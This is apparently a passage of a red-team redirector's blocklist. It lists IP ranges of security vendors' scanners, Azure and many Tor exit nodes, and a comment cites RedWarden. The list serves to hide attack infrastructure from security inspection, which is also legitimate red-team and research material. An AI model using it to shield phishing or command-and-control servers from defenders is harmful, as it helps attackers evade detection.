+52.238.78.88/32 # Microsoft URL Scanning +65.55.88.0/24 # Microsoft URL Scanning +65.55.169.0/24 # Microsoft URL Scanning +94.245.120.64/26 # Microsoft URL Scanning +104.47.0.0/17 # Microsoft URL Scanning +157.55.234.0/24 # Microsoft URL Scanning +157.56.110.0/23 # Microsoft URL Scanning +157.56.112.0/24 # Microsoft URL Scanning +207.46.100.0/24 # Microsoft URL Scanning +207.46.163.0/24 # Microsoft URL Scanning +213.199.154.0/24 # Microsoft URL Scanning +213.199.180.128/26 # Microsoft URL Scanning +216.32.180.0/23 # Microsoft URL Scanning + +208.87.232.0/21 # ForcePoint +157.167.1.0/24 # ForcePoint +157.167.2.0/24 # ForcePoint +204.15.64.0/23 # ForcePoint +204.15.66.0/24 # ForcePoint +204.15.67.0/24 # ForcePoint +204.15.68.0/24 # ForcePoint +204.15.69.0/24 # ForcePoint +208.80.192.0/21 # ForcePoint +208.80.198.0/24 # ForcePoint +208.80.199.0/24 # ForcePoint +86.111.218.0/23 # ForcePoint +86.111.220.0/23 # ForcePoint + +161.69.0.0/16 # McAfee +161.69.24.0/21 # McAfee +161.69.112.0/24 # McAfee + +165.255.0.0/17 # ZScaler + +195.189.155.0/24 # MiscContributions:@ztgrace +91.199.104.0/24 # MiscContributions:@ztgrace +91.212.136.0/24 # MiscContributions:@ztgrace +208.90.236.0/22 # MiscContributions:@ztgrace +204.13.200.0/22 # MiscContributions:@ztgrace +207.102.138.0/24 # MiscContributions:@ztgrace +208.87.232.0/21 # MiscContributions:@ztgrace +103.245.47.20 # MiscContributions:@ztgrace +182.75.165.176/30 # MiscContributions:@ztgrace + +# +# Disabled. More context here: +# https://github.com/mgeeky/RedWarden/issues/10#issuecomment-941690930 +# and here: +# https://gist.github.com/curi0usJack/971385e8334e189d93a6cb4671238b10#gistcomment-3734057 +# +# 173.94.0.0/16 # OtherVThosts +# 8.34.0.0/16 # OtherVThosts +# 8.35.0.0/16 # OtherVThosts + +150.70.0.0/22 # TrendMicro +150.70.104.0/22 # TrendMicro +150.70.110.0/24 # TrendMicro +150.70.112.0/20 # TrendMicro +150.70.12.0/22 # TrendMicro +150.70.160.0/20 # TrendMicro +150.70.176.0/20 # TrendMicro +150.70.192.0/21 # TrendMicro +150.70.224.0/20 # TrendMicro +150.70.240.0/20 # TrendMicro +150.70.31.0/24 # TrendMicro +150.70.4.0/22 # TrendMicro +150.70.64.0/18 # TrendMicro +150.70.64.0/20 # TrendMicro +150.70.8.0/22 # TrendMicro +150.70.80.0/20 # TrendMicro +150.70.96.0/20 # TrendMicro +206.165.76.0/24 # TrendMicro + +154.59.123.0/24 # PaloAlto +154.59.126.0/24 # PaloAlto +199.167.52.0/24 # PaloAlto +199.167.53.0/24 # PaloAlto +199.167.55.0/24 # PaloAlto +202.126.13.0/24 # PaloAlto +202.189.133.0/24 # PaloAlto +208.184.7.0/24 # PaloAlto +64.74.215.0/24 # PaloAlto +70.42.131.0/24 # PaloAlto +72.5.231.0/24 # PaloAlto +72.5.65.0/24 # PaloAlto +74.201.127.0/24 # PaloAlto +74.217.90.0/24 # PaloAlto + +148.163.148.0/22 # ProofPoint +148.163.156.0/23 # ProofPoint +208.84.65.0/24 # ProofPoint +208.84.66.0/24 # ProofPoint +208.86.202.0/24 # ProofPoint +208.86.203.0/24 # ProofPoint +67.231.144.0/24 # ProofPoint +67.231.145.0/24 # ProofPoint +67.231.146.0/24 # ProofPoint +67.231.147.0/24 # ProofPoint +67.231.148.0/24 # ProofPoint +67.231.149.0/24 # ProofPoint +67.231.151.0/24 # ProofPoint +67.231.158.0/24 # ProofPoint + +173.243.128.0/20 # Fortigate +173.243.136.0/21 # Fortigate +208.91.112.0/22 # Fortigate +208.91.112.0/23 # Fortigate +208.91.114.0/23 # Fortigate +23.249.49.0/24 # Fortigate +23.249.50.0/24 # Fortigate +23.249.51.0/24 # Fortigate +23.249.52.0/24 # Fortigate +23.249.53.0/24 # Fortigate +23.249.54.0/24 # Fortigate +23.249.55.0/24 # Fortigate +96.45.32.0/20 # Fortigate +96.45.32.0/21 # Fortigate +96.45.40.0/21 # Fortigate + +143.127.10.0/23 # Symantec +143.127.100.0/24 # Symantec +143.127.102.0/24 # Symantec +143.127.103.0/24 # Symantec +143.127.119.0/24 # Symantec +143.127.136.0/24 # Symantec +143.127.138.0/24 # Symantec +143.127.139.0/24 # Symantec +143.127.14.0/23 # Symantec +143.127.2.0/24 # Symantec +143.127.241.0/24 # Symantec +143.127.242.0/23 # Symantec +143.127.87.0/24 # Symantec +143.127.89.0/24 # Symantec +143.127.93.0/24 # Symantec +155.64.105.0/24 # Symantec +155.64.138.0/24 # Symantec +155.64.16.0/23 # Symantec +155.64.23.0/24 # Symantec +155.64.38.0/24 # Symantec +155.64.40.0/24 # Symantec +155.64.49.0/24 # Symantec +155.64.56.0/24 # Symantec +155.64.63.0/24 # Symantec +166.98.152.0/23 # Symantec +166.98.242.0/23 # Symantec +166.98.38.0/24 # Symantec +166.98.67.0/24 # Symantec +166.98.71.0/24 # Symantec +198.6.32.0/20 # Symantec +198.6.32.0/24 # Symantec +198.6.34.0/24 # Symantec +198.6.62.0/24 # Symantec +216.10.192.0/20 # Symantec +216.10.193.0/24 # Symantec + +104.40.0.0/13 # Microsoft + +104.208.0.0/16 # Azure +104.209.0.0/16 # Azure +104.210.0.0/16 # Azure +104.211.0.0/16 # Azure +104.214.0.0/16 # Azure +104.215.0.0/16 # Azure +104.40.0.0/16 # Azure +104.41.0.0/16 # Azure +104.42.0.0/16 # Azure +104.43.0.0/16 # Azure +104.44.0.0/16 # Azure +104.45.0.0/16 # Azure +104.46.0.0/16 # Azure +104.47.0.0/16 # Azure +111.221.0.0/16 # Azure +131.253.0.0/16 # Azure +134.170.0.0/16 # Azure +137.116.0.0/16 # Azure +137.117.0.0/16 # Azure +137.135.0.0/16 # Azure +138.91.0.0/16 # Azure +157.55.0.0/16 # Azure +157.56.0.0/16 # Azure +168.61.0.0/16 # Azure +168.62.0.0/16 # Azure +168.63.0.0/16 # Azure +191.232.0.0/16 # Azure +191.233.0.0/16 # Azure +191.234.0.0/16 # Azure +191.235.0.0/16 # Azure +191.236.0.0/16 # Azure +191.237.0.0/16 # Azure +191.238.0.0/16 # Azure +191.239.0.0/16 # Azure +193.149.0.0/16 # Azure +199.30.0.0/16 # Azure +20.184.0.0/16 # Azure +20.185.0.0/16 # Azure +20.186.0.0/16 # Azure +20.187.0.0/16 # Azure +20.188.0.0/16 # Azure +20.189.0.0/16 # Azure +20.190.0.0/16 # Azure +20.191.0.0/16 # Azure +20.36.0.0/16 # Azure +20.37.0.0/16 # Azure +20.38.0.0/16 # Azure +20.39.0.0/16 # Azure +20.40.0.0/16 # Azure +20.41.0.0/16 # Azure +20.42.0.0/16 # Azure +20.43.0.0/16 # Azure +20.44.0.0/16 # Azure +204.231.0.0/16 # Azure +207.46.0.0/16 # Azure +207.68.0.0/16 # Azure +209.240.0.0/16 # Azure +213.199.0.0/16 # Azure +23.100.0.0/16 # Azure +23.101.0.0/16 # Azure +23.102.0.0/16 # Azure +23.103.0.0/16 # Azure +23.96.0.0/16 # Azure +23.97.0.0/16 # Azure +23.98.0.0/16 # Azure +23.99.0.0/16 # Azure +40.112.0.0/16 # Azure +40.113.0.0/16 # Azure +40.114.0.0/16 # Azure +40.115.0.0/16 # Azure +40.116.0.0/16 # Azure +40.117.0.0/16 # Azure +40.118.0.0/16 # Azure +40.119.0.0/16 # Azure +40.121.0.0/16 # Azure +40.122.0.0/16 # Azure +40.123.0.0/16 # Azure +40.124.0.0/16 # Azure +40.125.0.0/16 # Azure +40.126.0.0/16 # Azure +40.127.0.0/16 # Azure +40.64.0.0/16 # Azure +40.65.0.0/16 # Azure +40.66.0.0/16 # Azure +40.67.0.0/16 # Azure +40.68.0.0/16 # Azure +40.69.0.0/16 # Azure +40.70.0.0/16 # Azure +40.71.0.0/16 # Azure +40.74.0.0/16 # Azure +40.75.0.0/16 # Azure +40.76.0.0/16 # Azure +40.77.0.0/16 # Azure +40.78.0.0/16 # Azure +40.79.0.0/16 # Azure +40.80.0.0/16 # Azure +40.81.0.0/16 # Azure +40.82.0.0/16 # Azure +40.83.0.0/16 # Azure +40.84.0.0/16 # Azure +40.85.0.0/16 # Azure +40.86.0.0/16 # Azure +40.87.0.0/16 # Azure +40.88.0.0/16 # Azure +40.89.0.0/16 # Azure +40.90.0.0/16 # Azure +40.91.0.0/16 # Azure +51.104.0.0/16 # Azure +51.105.0.0/16 # Azure +51.136.0.0/16 # Azure +51.137.0.0/16 # Azure +51.140.0.0/16 # Azure +51.141.0.0/16 # Azure +51.142.0.0/16 # Azure +51.143.0.0/16 # Azure +51.144.0.0/16 # Azure +51.145.0.0/16 # Azure +64.4.0.0/16 # Azure +65.52.0.0/16 # Azure +65.54.0.0/16 # Azure +65.55.0.0/16 # Azure +70.37.0.0/16 # Azure +94.245.0.0/16 # Azure + +64.235.144.0/24 # Barracuda + +103.10.197.50 # TOR Exit Nodes +103.16.16.107 # TOR Exit Nodes +103.234.220.197 # TOR Exit Nodes +103.236.201.110 # TOR Exit Nodes +103.236.201.57 # TOR Exit Nodes +103.27.124.82 # TOR Exit Nodes +103.29.70.23 # TOR Exit Nodes +103.3.61.114 # TOR Exit Nodes +103.35.74.75 # TOR Exit Nodes +103.35.74.77 # TOR Exit Nodes +103.56.207.84 # TOR Exit Nodes +103.8.79.229 # TOR Exit Nodes +104.132.0.72 # TOR Exit Nodes +104.192.0.58 # TOR Exit Nodes +104.200.20.46 # TOR Exit Nodes +104.208.158.116 # TOR Exit Nodes +104.218.63.73 # TOR Exit Nodes +104.218.63.74 # TOR Exit Nodes +104.218.63.75 # TOR Exit Nodes +104.218.63.76 # TOR Exit Nodes +104.223.123.98 # TOR Exit Nodes +104.236.141.156 # TOR Exit Nodes +104.244.72.200 # TOR Exit Nodes +104.244.74.78 # TOR Exit Nodes +106.187.37.101 # TOR Exit Nodes +107.181.174.84 # TOR Exit Nodes +109.126.9.228 # TOR Exit Nodes +109.169.33.163 # TOR Exit Nodes +109.190.182.44 # TOR Exit Nodes +109.201.133.100 # TOR Exit Nodes +109.69.67.17 # TOR Exit Nodes +111.248.62.31 # TOR Exit Nodes +115.70.208.19 # TOR Exit Nodes +118.163.74.160 # TOR Exit Nodes +120.29.217.46 # TOR Exit Nodes +124.109.1.207 # TOR Exit Nodes +125.212.241.182 # TOR Exit Nodes +126.72.58.19 # TOR Exit Nodes +128.199.47.160 # TOR Exit Nodes +128.199.76.145 # TOR Exit Nodes +128.52.128.105 # TOR Exit Nodes +13.79.231.167 # TOR Exit Nodes +130.204.161.3 # TOR Exit Nodes +133.218.180.149 # TOR Exit Nodes +137.74.167.96 # TOR Exit Nodes +137.74.169.241 # TOR Exit Nodes +137.74.73.179 # TOR Exit Nodes +138.197.167.60 # TOR Exit Nodes +138.197.207.243 # TOR Exit Nodes +138.197.85.80 # TOR Exit Nodes +139.162.10.72 # TOR Exit Nodes +139.162.105.26 # TOR Exit Nodes +139.162.124.207 # TOR Exit Nodes +139.162.16.13 # TOR Exit Nodes +139.162.226.245 # TOR Exit Nodes +139.162.28.23 # TOR Exit Nodes +139.162.28.31 # TOR Exit Nodes +139.59.213.165 # TOR Exit Nodes +139.59.62.94 # TOR Exit Nodes +14.202.230.49 # TOR Exit Nodes +141.170.2.53 # TOR Exit Nodes +141.255.189.161 # TOR Exit Nodes +142.4.211.161 # TOR Exit Nodes +142.44.166.241 # TOR Exit Nodes +144.217.161.119 # TOR Exit Nodes +144.217.167.240 # TOR Exit Nodes +144.217.174.248 # TOR Exit Nodes +144.217.240.34 # TOR Exit Nodes +144.217.94.195 # TOR Exit Nodes +144.217.94.96 # TOR Exit Nodes +145.220.75.103 # TOR Exit Nodes +145.239.29.201 # TOR Exit Nodes +145.239.74.47 # TOR Exit Nodes +145.239.82.79 # TOR Exit Nodes +145.239.91.37 # TOR Exit Nodes +146.185.177.103 # TOR Exit Nodes +147.135.156.122 # TOR Exit Nodes +149.202.185.34 # TOR Exit Nodes +149.56.201.79 # TOR Exit Nodes +149.56.223.241 # TOR Exit Nodes +151.80.238.152 # TOR Exit Nodes +154.127.60.92 # TOR Exit Nodes +154.16.149.35 # TOR Exit Nodes +154.16.149.74 # TOR Exit Nodes +155.133.64.203 # TOR Exit Nodes +155.4.230.97 # TOR Exit Nodes +155.4.250.85 # TOR Exit Nodes +156.67.106.251 # TOR Exit Nodes +156.67.106.30 # TOR Exit Nodes +156.67.106.32 # TOR Exit Nodes +158.255.6.242 # TOR Exit Nodes +158.255.7.61 # TOR Exit Nodes +158.69.215.7 # TOR Exit Nodes +158.69.83.25 # TOR Exit Nodes +161.184.238.220 # TOR Exit Nodes +162.219.176.26 # TOR Exit Nodes +162.220.246.230 # TOR Exit Nodes +162.221.201.57 # TOR Exit Nodes +162.243.166.137 # TOR Exit Nodes +162.243.75.204 # TOR Exit Nodes +162.247.72.199 # TOR Exit Nodes +162.247.72.200 # TOR Exit Nodes +162.247.72.201 # TOR Exit Nodes +162.247.72.202 # TOR Exit Nodes +162.247.72.213 # TOR Exit Nodes +162.247.72.216 # TOR Exit Nodes +162.247.72.217 # TOR Exit Nodes +162.247.72.27 # TOR Exit Nodes +162.247.72.7 # TOR Exit Nodes +162.247.73.204 # TOR Exit Nodes +162.247.73.206 # TOR Exit Nodes +163.172.101.137 # TOR Exit Nodes +163.172.136.101 # TOR Exit Nodes +163.172.137.174 # TOR Exit Nodes +163.172.137.222 # TOR Exit Nodes +163.172.138.11 # TOR Exit Nodes +163.172.139.161 # TOR Exit Nodes +163.172.140.123 # TOR Exit Nodes +163.172.151.250 # TOR Exit Nodes +163.172.151.47 # TOR Exit Nodes +163.172.160.182 # TOR Exit Nodes +163.172.162.106 # TOR Exit Nodes +163.172.163.85 # TOR Exit Nodes +163.172.171.163 # TOR Exit Nodes +163.172.179.129 # TOR Exit Nodes +163.172.212.115 # TOR Exit Nodes +163.172.217.50 # TOR Exit Nodes +163.172.223.200 # TOR Exit Nodes +163.172.223.87 # TOR Exit Nodes +164.132.106.162 # TOR Exit Nodes +164.132.41.140 # TOR Exit Nodes +164.132.51.91 # TOR Exit Nodes +164.77.133.220 # TOR Exit Nodes +165.227.200.152 # TOR Exit Nodes +165.227.58.177 # TOR Exit Nodes +165.255.186.248 # TOR Exit Nodes +165.255.224.117 # TOR Exit Nodes +166.70.15.14 # TOR Exit Nodes +166.70.207.2 # TOR Exit Nodes +167.114.251.167 # TOR Exit Nodes +167.114.34.150 # TOR Exit Nodes +169.239.183.210 # TOR Exit Nodes +170.250.140.52 # TOR Exit Nodes +171.25.193.20 # TOR Exit Nodes +171.25.193.235 # TOR Exit Nodes +171.25.193.25 # TOR Exit Nodes +171.25.193.77 # TOR Exit Nodes +171.25.193.78 # TOR Exit Nodes +172.104.148.28 # TOR Exit Nodes +172.104.187.79 # TOR Exit Nodes +172.93.48.163 # TOR Exit Nodes +172.98.193.43 # TOR Exit Nodes +173.14.173.227 # TOR Exit Nodes +173.208.153.75 # TOR Exit Nodes +173.249.2.79 # TOR Exit Nodes +173.254.216.66 # TOR Exit Nodes +173.255.226.142 # TOR Exit Nodes +173.255.231.125 # TOR Exit Nodes +173.255.253.173 # TOR Exit Nodes +176.10.104.240 # TOR Exit Nodes +176.10.104.243 # TOR Exit Nodes +176.10.107.180 # TOR Exit Nodes +176.121.10.52 # TOR Exit Nodes +176.126.252.11 # TOR Exit Nodes +176.126.252.12 # TOR Exit Nodes +176.223.113.26 # TOR Exit Nodes +176.31.180.157 # TOR Exit Nodes +176.31.45.3 # TOR Exit Nodes +176.36.117.185 # TOR Exit Nodes +176.38.163.77 # TOR Exit Nodes +176.58.100.98 # TOR Exit Nodes +176.58.89.182 # TOR Exit Nodes +177.133.182.77 # TOR Exit Nodes +177.157.253.157 # TOR Exit Nodes +178.17.170.13 # TOR Exit Nodes +178.17.170.135 # TOR Exit Nodes +178.17.170.149 # TOR Exit Nodes +178.17.170.156 # TOR Exit Nodes +178.17.170.164 # TOR Exit Nodes +178.17.170.194 # TOR Exit Nodes +178.17.170.195 # TOR Exit Nodes +178.17.170.196 # TOR Exit Nodes +178.17.171.111 # TOR Exit Nodes +178.17.171.49 # TOR Exit Nodes +178.17.174.10 # TOR Exit Nodes +178.17.174.14 # TOR Exit Nodes +178.17.174.198 # TOR Exit Nodes +178.175.131.194 # TOR Exit Nodes +178.18.83.215 # TOR Exit Nodes +178.20.55.16 # TOR Exit Nodes +178.20.55.18 # TOR Exit Nodes +178.202.169.177 # TOR Exit Nodes +178.209.42.84 # TOR Exit Nodes +178.238.237.44 # TOR Exit Nodes +178.32.181.97 # TOR Exit Nodes +178.32.181.98 # TOR Exit Nodes +178.32.181.99 # TOR Exit Nodes +18.248.1.85 # TOR Exit Nodes +18.248.2.85 # TOR Exit Nodes +18.85.22.204 # TOR Exit Nodes +185.10.68.119 # TOR Exit Nodes +185.10.68.139 # TOR Exit Nodes +185.10.68.191 # TOR Exit Nodes +185.100.84.108 # TOR Exit Nodes +185.100.84.82 # TOR Exit Nodes +185.100.85.101 # TOR Exit Nodes +185.100.85.112 # TOR Exit Nodes +185.100.85.147 # TOR Exit Nodes +185.100.85.190 # TOR Exit Nodes +185.100.85.191 # TOR Exit Nodes +185.100.85.192 # TOR Exit Nodes +185.100.85.61 # TOR Exit Nodes +185.100.86.100 # TOR Exit Nodes +185.100.86.141 # TOR Exit Nodes +185.100.86.154 # TOR Exit Nodes +185.100.86.167 # TOR Exit Nodes +185.100.86.199 # TOR Exit Nodes +185.100.86.217 # TOR Exit Nodes +185.100.86.69 # TOR Exit Nodes +185.100.86.86 # TOR Exit Nodes +185.100.87.206 # TOR Exit Nodes +185.100.87.207 # TOR Exit Nodes +185.100.87.82 # TOR Exit Nodes +185.103.99.60 # TOR Exit Nodes +185.104.120.2 # TOR Exit Nodes +185.104.120.3 # TOR Exit Nodes +185.104.120.4 # TOR Exit Nodes +185.104.120.7 # TOR Exit Nodes +185.107.81.233 # TOR Exit Nodes +185.107.81.234 # TOR Exit Nodes +185.11.167.4 # TOR Exit Nodes +185.112.157.135 # TOR Exit Nodes +185.112.254.195 # TOR Exit Nodes +185.117.215.9 # TOR Exit Nodes +185.127.25.68 # TOR Exit Nodes +185.129.62.62 # TOR Exit Nodes +185.157.232.64 # TOR Exit Nodes +185.159.128.193 # TOR Exit Nodes +185.16.200.176 # TOR Exit Nodes +185.163.1.11 # TOR Exit Nodes +185.165.168.229 # TOR Exit Nodes +185.165.168.42 # TOR Exit Nodes +185.165.168.77 # TOR Exit Nodes +185.165.169.23 # TOR Exit Nodes +185.169.235.5 # TOR Exit Nodes +185.170.42.18 # TOR Exit Nodes +185.177.59.206 # TOR Exit Nodes +185.186.77.27 # TOR Exit Nodes +185.189.14.230 # TOR Exit Nodes +185.189.14.61 # TOR Exit Nodes +185.203.240.111 # TOR Exit Nodes +185.203.241.120 # TOR Exit Nodes +185.203.242.105 # TOR Exit Nodes +185.209.20.165 # TOR Exit Nodes +185.209.20.209 # TOR Exit Nodes +185.209.21.47 # TOR Exit Nodes +185.219.82.241 # TOR Exit Nodes +185.219.82.242 # TOR Exit Nodes +185.219.82.243 # TOR Exit Nodes +185.31.172.234 # TOR Exit Nodes +185.34.33.2 # TOR Exit Nodes +185.38.14.171 # TOR Exit Nodes +185.38.14.215 # TOR Exit Nodes +185.61.138.207 # TOR Exit Nodes +185.61.149.193 # TOR Exit Nodes +185.62.57.91 # TOR Exit Nodes +185.65.205.10 # TOR Exit Nodes +185.66.200.10 # TOR Exit Nodes +185.70.11.132 # TOR Exit Nodes +185.72.244.24 # TOR Exit Nodes +185.82.216.233 # TOR Exit Nodes +185.82.217.51 # TOR Exit Nodes +185.82.217.70 # TOR Exit Nodes +185.86.149.175 # TOR Exit Nodes +185.87.111.113 # TOR Exit Nodes +185.87.185.45 # TOR Exit Nodes +186.120.225.119 # TOR Exit Nodes +187.20.55.95 # TOR Exit Nodes +188.116.11.181 # TOR Exit Nodes +188.143.42.27 # TOR Exit Nodes +188.166.127.251 # TOR Exit Nodes +188.214.104.146 # TOR Exit Nodes +188.235.14.159 # TOR Exit Nodes +188.235.37.42 # TOR Exit Nodes +189.207.179.80 # TOR Exit Nodes +189.84.21.44 # TOR Exit Nodes +190.10.8.50 # TOR Exit Nodes +190.210.98.90 # TOR Exit Nodes +191.34.129.22 # TOR Exit Nodes +191.96.249.110 # TOR Exit Nodes +192.150.187.46 # TOR Exit Nodes +192.160.102.164 # TOR Exit Nodes +192.160.102.165 # TOR Exit Nodes +192.160.102.166 # TOR Exit Nodes +192.160.102.168 # TOR Exit Nodes +192.160.102.169 # TOR Exit Nodes +192.160.102.170 # TOR Exit Nodes +192.195.80.10 # TOR Exit Nodes +192.241.79.178 # TOR Exit Nodes +192.243.113.200 # TOR Exit Nodes +192.34.80.176 # TOR Exit Nodes +192.36.27.4 # TOR Exit Nodes +192.36.27.6 # TOR Exit Nodes +192.36.27.7 # TOR Exit Nodes +192.42.115.102 # TOR Exit Nodes +192.42.116.16 # TOR Exit Nodes +192.81.131.49 # TOR Exit Nodes +193.107.85.56 # TOR Exit Nodes +193.107.85.57 # TOR Exit Nodes +193.110.157.151 # TOR Exit Nodes +193.15.16.4 # TOR Exit Nodes +193.164.131.95 # TOR Exit Nodes +193.171.202.150 # TOR Exit Nodes +193.201.225.45 # TOR Exit Nodes +193.233.60.154 # TOR Exit Nodes +193.70.39.41 # TOR Exit Nodes +193.90.12.115 # TOR Exit Nodes +193.90.12.116 # TOR Exit Nodes +193.90.12.117 # TOR Exit Nodes +193.90.12.118 # TOR Exit Nodes +193.90.12.119 # TOR Exit Nodes +194.218.3.79 # TOR Exit Nodes +194.54.162.212 # TOR Exit Nodes +194.88.143.66 # TOR Exit Nodes +195.219.163.68 # TOR Exit Nodes +195.219.166.53 # TOR Exit Nodes +195.22.126.177 # TOR Exit Nodes +195.22.126.178 # TOR Exit Nodes +195.228.45.176 # TOR Exit Nodes +195.254.135.76 # TOR Exit Nodes +196.41.123.180 # TOR Exit Nodes +196.54.55.14 # TOR Exit Nodes +197.231.221.211 # TOR Exit Nodes +198.100.148.112 # TOR Exit Nodes +198.167.223.38 # TOR Exit Nodes +198.211.122.191 # TOR Exit Nodes +198.245.60.8 # TOR Exit Nodes +198.46.138.18 # TOR Exit Nodes +198.50.159.155 # TOR Exit Nodes +198.50.159.204 # TOR Exit Nodes +198.50.200.129 # TOR Exit Nodes +198.50.200.131 # TOR Exit Nodes +198.50.200.134 # TOR Exit Nodes +198.50.200.135 # TOR Exit Nodes +198.50.200.147 # TOR Exit Nodes +198.58.100.240 # TOR Exit Nodes +198.58.107.53 # TOR Exit Nodes +198.73.50.71 # TOR Exit Nodes +198.96.155.3 # TOR Exit Nodes +199.127.226.150 # TOR Exit Nodes +199.249.223.40 # TOR Exit Nodes +199.249.223.41 # TOR Exit Nodes +199.249.223.42 # TOR Exit Nodes +199.249.223.43 # TOR Exit Nodes +199.249.223.44 # TOR Exit Nodes +199.249.223.45 # TOR Exit Nodes +199.249.223.46 # TOR Exit Nodes +199.249.223.47 # TOR Exit Nodes +199.249.223.48 # TOR Exit Nodes +199.249.223.49 # TOR Exit Nodes +199.249.223.60 # TOR Exit Nodes +199.249.223.61 # TOR Exit Nodes +199.249.223.62 # TOR Exit Nodes +199.249.223.63 # TOR Exit Nodes +199.249.223.64 # TOR Exit Nodes +199.249.223.65 # TOR Exit Nodes +199.249.223.66 # TOR Exit Nodes +199.249.223.67 # TOR Exit Nodes +199.249.223.68 # TOR Exit Nodes +199.249.223.69 # TOR Exit Nodes +199.249.223.71 # TOR Exit Nodes +199.249.223.72 # TOR Exit Nodes +199.249.223.73 # TOR Exit Nodes +199.249.223.74 # TOR Exit Nodes +199.249.223.75 # TOR Exit Nodes +199.249.223.76 # TOR Exit Nodes +199.249.223.77 # TOR Exit Nodes +199.249.223.78 # TOR Exit Nodes +199.249.223.79 # TOR Exit Nodes +199.249.223.81 # TOR Exit Nodes +199.249.224.40 # TOR Exit Nodes +199.249.224.41 # TOR Exit Nodes +199.249.224.42 # TOR Exit Nodes +199.249.224.43 # TOR Exit Nodes +199.249.224.44 # TOR Exit Nodes +199.249.224.45 # TOR Exit Nodes +199.249.224.46 # TOR Exit Nodes +199.249.224.47 # TOR Exit Nodes +199.249.224.48 # TOR Exit Nodes +199.249.224.49 # TOR Exit Nodes +199.249.224.60 # TOR Exit Nodes +199.249.224.61 # TOR Exit Nodes +199.249.224.62 # TOR Exit Nodes +199.249.224.63 # TOR Exit Nodes +199.249.224.64 # TOR Exit Nodes +199.249.224.65 # TOR Exit Nodes +199.249.224.66 # TOR Exit Nodes +199.249.224.67 # TOR Exit Nodes +199.249.224.68 # TOR Exit Nodes +199.249.224.69 # TOR Exit Nodes +199.68.196.124 # TOR Exit Nodes +199.87.154.255 # TOR Exit Nodes +2.238.18.141 # TOR Exit Nodes +203.88.136.199 # TOR Exit Nodes +204.11.50.131 # TOR Exit Nodes +204.194.29.4 # TOR Exit Nodes +204.8.156.142 # TOR Exit Nodes +204.85.191.30 # TOR Exit Nodes +204.85.191.31 # TOR Exit Nodes +205.166.94.153 # TOR Exit Nodes +205.168.84.133 # TOR Exit Nodes +206.55.74.0 # TOR Exit Nodes +207.154.238.204 # TOR Exit Nodes +207.244.70.35 # TOR Exit Nodes +208.67.1.79 # TOR Exit Nodes +208.67.1.83 # TOR Exit Nodes +208.94.110.37 # TOR Exit Nodes +209.123.234.23 # TOR Exit Nodes +210.3.102.152 # TOR Exit Nodes +210.50.9.88 # TOR Exit Nodes +211.21.48.217 # TOR Exit Nodes +212.16.104.33 # TOR Exit Nodes +212.19.17.213 # TOR Exit Nodes +212.21.66.6 # TOR Exit Nodes +212.47.229.60 # TOR Exit Nodes +212.47.239.73 # TOR Exit Nodes +212.47.243.140 # TOR Exit Nodes +212.47.246.21 # TOR Exit Nodes +212.81.199.159 # TOR Exit Nodes +212.83.40.239 # TOR Exit Nodes +212.92.219.15 # TOR Exit Nodes +213.108.105.71 # TOR Exit Nodes +213.108.105.92 # TOR Exit Nodes +213.61.149.100 # TOR Exit Nodes +213.95.21.54 # TOR Exit Nodes +216.218.134.12 # TOR Exit Nodes +216.218.222.11 # TOR Exit Nodes +216.218.222.12 # TOR Exit Nodes +216.239.90.19 # TOR Exit Nodes +217.115.10.131 # TOR Exit Nodes +217.170.197.83 # TOR Exit Nodes +217.182.207.27 # TOR Exit Nodes +217.182.74.253 # TOR Exit Nodes +217.182.76.240 # TOR Exit Nodes +217.182.78.177 # TOR Exit Nodes +217.197.81.19 # TOR Exit Nodes +220.227.48.213 # TOR Exit Nodes +222.110.3.1 # TOR Exit Nodes +223.26.48.248 # TOR Exit Nodes +23.129.64.11 # TOR Exit Nodes +23.129.64.12 # TOR Exit Nodes +23.129.64.13 # TOR Exit Nodes +23.129.64.14 # TOR Exit Nodes +23.129.64.15 # TOR Exit Nodes +23.83.238.245 # TOR Exit Nodes +23.92.27.23 # TOR Exit Nodes +23.92.28.23 # TOR Exit Nodes +24.207.212.154 # TOR Exit Nodes +24.27.178.106 # TOR Exit Nodes +31.179.151.198 # TOR Exit Nodes +31.185.104.19 # TOR Exit Nodes +31.185.104.20 # TOR Exit Nodes +31.185.104.21 # TOR Exit Nodes +31.185.27.208 # TOR Exit Nodes +31.220.111.120 # TOR Exit Nodes +35.184.106.64 # TOR Exit Nodes +35.193.100.176 # TOR Exit Nodes +36.227.161.175 # TOR Exit Nodes +37.139.8.104 # TOR Exit Nodes +37.187.129.166 # TOR Exit Nodes +37.187.53.94 # TOR Exit Nodes +37.187.7.74 # TOR Exit Nodes +37.218.240.21 # TOR Exit Nodes +37.218.240.50 # TOR Exit Nodes +37.218.240.68 # TOR Exit Nodes +37.218.240.80 # TOR Exit Nodes +37.220.35.202 # TOR Exit Nodes +37.220.36.240 # TOR Exit Nodes +37.48.120.196 # TOR Exit Nodes +37.59.101.176 # TOR Exit Nodes +37.59.112.7 # TOR Exit Nodes +37.59.116.170 # TOR Exit Nodes +37.59.119.196 # TOR Exit Nodes +37.97.228.159 # TOR Exit Nodes +41.100.127.24 # TOR Exit Nodes +41.100.95.92 # TOR Exit Nodes +41.103.213.190 # TOR Exit Nodes +41.206.188.206 # TOR Exit Nodes +41.78.128.113 # TOR Exit Nodes +45.33.23.23 # TOR Exit Nodes +45.33.48.204 # TOR Exit Nodes +45.35.72.85 # TOR Exit Nodes +45.62.236.66 # TOR Exit Nodes +45.62.251.245 # TOR Exit Nodes +45.76.115.159 # TOR Exit Nodes +45.79.137.11 # TOR Exit Nodes +45.79.144.222 # TOR Exit Nodes +45.79.198.115 # TOR Exit Nodes +45.79.208.219 # TOR Exit Nodes +45.79.73.22 # TOR Exit Nodes +45.79.85.112 # TOR Exit Nodes +46.101.127.145 # TOR Exit Nodes +46.101.139.248 # TOR Exit Nodes +46.101.150.49 # TOR Exit Nodes +46.101.164.37 # TOR Exit Nodes +46.165.230.5 # TOR Exit Nodes +46.165.254.166 # TOR Exit Nodes +46.17.97.112 # TOR Exit Nodes +46.182.106.190 # TOR Exit Nodes +46.182.18.214 # TOR Exit Nodes +46.182.18.40 # TOR Exit Nodes +46.182.18.46 # TOR Exit Nodes +46.182.19.15 # TOR Exit Nodes +46.182.19.219 # TOR Exit Nodes +46.183.218.199 # TOR Exit Nodes +46.194.136.3 # TOR Exit Nodes +46.194.23.204 # TOR Exit Nodes +46.226.108.26 # TOR Exit Nodes +46.233.0.70 # TOR Exit Nodes +46.235.227.70 # TOR Exit Nodes +46.246.35.71 # TOR Exit Nodes +46.246.35.72 # TOR Exit Nodes +46.246.35.81 # TOR Exit Nodes +46.246.49.100 # TOR Exit 